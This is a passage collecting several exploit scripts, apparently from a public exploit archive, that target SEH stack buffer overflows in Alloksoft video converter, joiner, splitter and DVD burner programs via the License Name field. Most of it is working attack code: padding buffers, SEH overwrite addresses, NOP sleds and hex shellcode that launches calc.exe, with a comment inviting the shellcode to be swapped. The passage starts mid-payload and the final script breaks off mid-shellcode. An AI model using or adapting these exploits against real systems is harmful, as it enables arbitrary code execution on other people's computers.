
41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x
41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x
41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x
41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x
41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x
41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x
41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
outfile = file("poc.wav", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"
            
# SWAMI KARUPASAMI THUNAI

###############################################################################
# Exploit Title:        Allok soft WMV to AVI MPEG DVD WMV Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date:                 06-03-2018
# Exploit Author:       Mohan Ravichandran & Velayutham Selvaraj
# Organization :        TwinTech Solutions (Talented Pentesters Hut)
# Vulnerable Software:  Allok WMV to AVI MPEG DVD WMV Converter
# Vendor Homepage:      http://www.alloksoft.com
# Version:              4.6.1217
# Software Link:        http://www.alloksoft.com/wmv.htm
# Tested On:            Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerability
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ... 
#1.  Download and install the setup file
#2.  Run this exploit code via python 2.7
#3.  A file "exploit.txt" will be created
#4.  Copy the contents of the file and paste in the License Name field 
#    Name > exploit.txt
#5.  Type some random character in License Code
#6.  Click Register and voila !
#7.  Boom calculator opens
#
##############################################################################
import struct

file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh  = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
            
#######################################################
# Exploit Title: Buffer Overflow (SEH) on Allok Video to DVD Burner 2.6.1217
# Date: 23.04.2018
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_dvdburner.exe
# Category: Local
# Contact: https://twitter.com/T3jv1l
# Version: Allok Video to DVD Burner 2.6.1217
# Tested on: Windows 7 SP1 x86
# Hello subinacls !
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################

print"""
#1.  Download and install the setup file
#2.  Run this exploit code via python 2.7
#3.  A file "Evil.txt" will be created
#4.  Copy the contents of the file (Evil.txt)and paste in the License Name field 
#5.  Click Register and BOMM !!!! """

import struct

file = open("Evil.txt","wb")
buffer = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh  = struct.pack("<L",0x10019A09)
nop = "\x90" * 20

# Shellcode Calc.exe

buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"
exploit = junk + nseh + seh + nop + buf
fillers = buffer - len(exploit)
crush = exploit + "T" * fillers
print "[+] Crush Me"
file.write(crush)
file.close()
            
###########################################################################################
# Exploit Title: Allok Video Splitter 3.1.1217
# Date: 2018-05-09
# Exploit Author: Achilles
# Vendor Homepage: http://www.alloksoft.com/
# Vulnerable Software: http://www.alloksoft.com/allok_vsplitter.exe
# Tested on OS: Windows 7 64-bit DE
# Steps to reproduce: copy the contents of the file (Evil.txt),
# paste them into the License Name field, click Register and BOOM
###########################################################################################

#!/usr/bin/python
  
buffer = "A" * 780
  
try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
            
# SWAMI KARUPASAMI THUNAI

###############################################################################
# Exploit Title:        Alloksoft Video joiner (4.6.1217) - Buffer Overflow Vulnerability (Windows XP SP3)
# Date:                 06-03-2018
# Exploit Author:       Mohan Ravichandran & Velayutham Selvaraj
# Organization :        TwinTech Solutions
# Vulnerable Software:  Allok Video joiner
# Vendor Homepage:      http://www.alloksoft.com
# Version:              4.6.1217
# Software Link:        http://www.alloksoft.com/joiner.htm
# Tested On:            Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerability
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ... 
#1.  Download and install the setup file
#2.  Run this exploit code via python 2.7
#3.  A file "exploit.txt" will be created
#4.  Copy the contents of the file and paste in the License Name field 
#    Name > exploit.txt
#5.  Type some random character in License Code
#6.  Click Register and voila !
#7.  Boom calculator opens
#
##############################################################################
import struct

file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh  = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
            
# Exploit Title: Allok Video Converter 4.6.1217 - Stack Overflow (SEH)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.alloksoft.com
# Software Link: https://www.alloksoft.com/allok_vconverter.exe
# Version: 4.6.1217
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt into the License Name input field
# of Allok Video Converter 4.6.1217 to execute calc.exe.

nseh_offset = 780
total = 1000

# msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
shellcode_calc =  b""
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
